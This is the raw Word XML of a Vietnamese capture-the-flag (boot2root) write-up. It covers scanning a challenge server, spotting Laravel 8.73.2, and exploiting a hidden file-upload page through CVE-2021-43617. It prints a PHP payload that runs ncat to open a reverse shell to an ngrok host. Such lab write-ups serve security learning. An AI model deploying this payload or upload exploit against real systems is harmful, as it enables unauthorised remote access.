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F9753" w14:textId="025BEC49" w:rsidR="001D56EF" w:rsidRDefault="00AB08F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB08F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Write up boot2root white-hat </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B845908" w14:textId="184DA1E2" w:rsidR="00334973" w:rsidRDefault="00334973">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Footprint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CFBBC9" w14:textId="4B708260" w:rsidR="00AB08F9" w:rsidRPr="00334973" w:rsidRDefault="00AB08F9" w:rsidP="00334973">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Đầu tiên ta cần khảo sát server, quét nmap nhanh với “</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB08F9">
        <w:t xml:space="preserve">sudo nmap -A -sS -O 49.236.211.69 -vv </w:t>
      </w:r>
      <w:r>
        <w:t>“ ta có được 2 port 22 và 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529E442B" w14:textId="02DB98EB" w:rsidR="00334973" w:rsidRPr="00334973" w:rsidRDefault="00334973" w:rsidP="0033497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Ở đây vài lần đầu nmap chỉ scan ra mỗi port 22 do mình quét chưa đủ, sau khi rà soát tất cả port bằng option -p- thì mình thấy chỉ có 2 port và không quét nữa </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D947705" w14:textId="3C98E793" w:rsidR="00AB08F9" w:rsidRDefault="00AB08F9">
      <w:r w:rsidRPr="00AB08F9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54DA501F" wp14:editId="6FAE1BB5">
            <wp:extent cx="5943600" cy="4360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861" w14:textId="7591E33E" w:rsidR="00AB08F9" w:rsidRDefault="00AB08F9"/>
    <w:p w14:paraId="5F2FE2C2" w14:textId="04E0C4DA" w:rsidR="00334973" w:rsidRDefault="00AB08F9" w:rsidP="00334973">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vì bình thường không thấy ai </w:t>
      </w:r>
      <w:r w:rsidR="00334973">
        <w:t>đ</w:t>
      </w:r>
      <w:r>
        <w:t>âm vào port 22 làm chi nên mình</w:t>
      </w:r>
      <w:r w:rsidR="00334973">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>check luôn port 8000 :v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEC9F56" w14:textId="61D50C95" w:rsidR="00334973" w:rsidRPr="00334973" w:rsidRDefault="00334973" w:rsidP="00334973">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00334973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E2300" w14:textId="375C3284" w:rsidR="00334973" w:rsidRDefault="00334973" w:rsidP="00334973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FBAB239" wp14:editId="4C7BEF67">
            <wp:extent cx="5759450" cy="32415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5" cy="32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D3F5" w14:textId="25724E53" w:rsidR="00334973" w:rsidRDefault="00334973" w:rsidP="00334973">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D338458" w14:textId="588CA253" w:rsidR="00334973" w:rsidRDefault="00334973" w:rsidP="0033497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Ta có thông tin về Laravel v8.73.2, nhớ mang máng là white-hat từng lên 1 bài về con hàng này :v, kiểm tra lại là ra ngay: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="001732CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>https://whitehat.vn/threads/phan-tich-va-huong-dan-trien-khai-cve-2021-43617-phan-1.16286/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="001732CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>https://whitehat.vn/threads/phan-tich-va-huong-dan-trien-khai-cve-2021-43617-phan-2.16627/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0019595B" w14:textId="1A348022" w:rsidR="00334973" w:rsidRDefault="00334973" w:rsidP="0033497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Đề bài khả năng cũng tương tự, mình thử nhảy vào upload xem có gì vui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B245976" w14:textId="35DC0682" w:rsidR="00334973" w:rsidRDefault="00334973" w:rsidP="00334973">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00334973">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="277BA618" wp14:editId="2E92192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F497" w14:textId="22CB61BD" w:rsidR="007A3BEC" w:rsidRDefault="007A3BEC" w:rsidP="007A3B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“Nothing here” :V, vì non tay nên mình scan bằng dirbuster luôn, tuy nhiên scan vài phút không thấy gì, bản năng mách bảo có gì đó không ổn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F715AE3" w14:textId="785091F2" w:rsidR="007A3BEC" w:rsidRDefault="007A3BEC" w:rsidP="007A3BEC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3BEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1911C326" wp14:editId="54AC7D52">
            <wp:extent cx="5943600" cy="4010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E4FA" w14:textId="5F0A0C57" w:rsidR="007A3BEC" w:rsidRDefault="007A3BEC" w:rsidP="007A3B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Hóa ra các anh ẩn nó đi bằng js, tí thì bị lừa :V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AA4705" w14:textId="2F257B89" w:rsidR="007A3BEC" w:rsidRDefault="007A3BEC" w:rsidP="007A3B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Đến đây thì mọi thứ đã giống như bài hướng dẫn, chỉ việc phang payload vào và lên shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C00F961" w14:textId="0E207148" w:rsidR="00ED0BF4" w:rsidRDefault="00ED0BF4" w:rsidP="007A3B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Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED0BF4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>&lt;?php system("ncat -e /bin/sh 2.tcp.ngrok.io 12714 "); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D6E71E" w14:textId="50CFAFF8" w:rsidR="007A3BEC" w:rsidRDefault="007A3BEC" w:rsidP="007A3BEC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3BEC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="498B4428" wp14:editId="336C559F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AA0A" w14:textId="0DA69D98" w:rsidR="00ED0BF4" w:rsidRDefault="00ED0BF4" w:rsidP="007A3BEC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED0BF4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65A19CC1" wp14:editId="29331632">
            <wp:extent cx="5943600" cy="3260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C410" w14:textId="6DBC6E16" w:rsidR="00ED0BF4" w:rsidRDefault="00ED0BF4" w:rsidP="007A3BEC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D834C8" w14:textId="03EB301D" w:rsidR="00ED0BF4" w:rsidRDefault="00ED0BF4" w:rsidP="007A3BEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED0BF4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Explore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A16947" w14:textId="05DCA56F" w:rsidR="00ED0BF4" w:rsidRPr="00ED0BF4" w:rsidRDefault="00ED0BF4" w:rsidP="00ED0BF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Đến đây thì mình bắt đầu loay hoay, vì chưa chơi món này bao giờ nên đành tham khảo từ ae trên discord</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00ED0BF4" w:rsidRPr="00ED0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8.15pt;height:3.15pt;visibility:visible" o:bullet="t">
        <v:imagedata r:id="rId1" o:title=""/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3B9572C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8EB89496"/>
    <w:lvl w:ilvl="0" w:tplc="D528F89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13072B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="406CF01C"/>
    <w:lvl w:ilvl="0" w:tplc="2A6A7D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CE2A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4279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F86C5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BE0DE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2669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042D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566B3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96DA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B544212"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="23E09624"/>
    <w:lvl w:ilvl="0" w:tplc="C706E4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41255">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="379327207">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="549390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8F9"/>
    <w:rsid w:val="001D56EF"/>
    <w:rsid w:val="002057E0"/>
    <w:rsid w:val="00334973"/>
    <w:rsid w:val="007A3BEC"/>
    <w:rsid w:val="00AB08F9"/>
    <w:rsid w:val="00D42C84"/>
    <w:rsid w:val="00ED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1DE27"/>
  <w15:docId w15:val="{4B21570F-4552-4878-A399-FEE311B8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49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9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hitehat.vn/threads/phan-tich-va-huong-dan-trien-khai-cve-2021-43617-phan-2.16627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hitehat.vn/threads/phan-tich-va-huong-dan-trien-khai-cve-2021-43617-phan-1.16286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Thân Trọng Thành</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Thân Trọng Thành</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-20T19:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-21T14:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>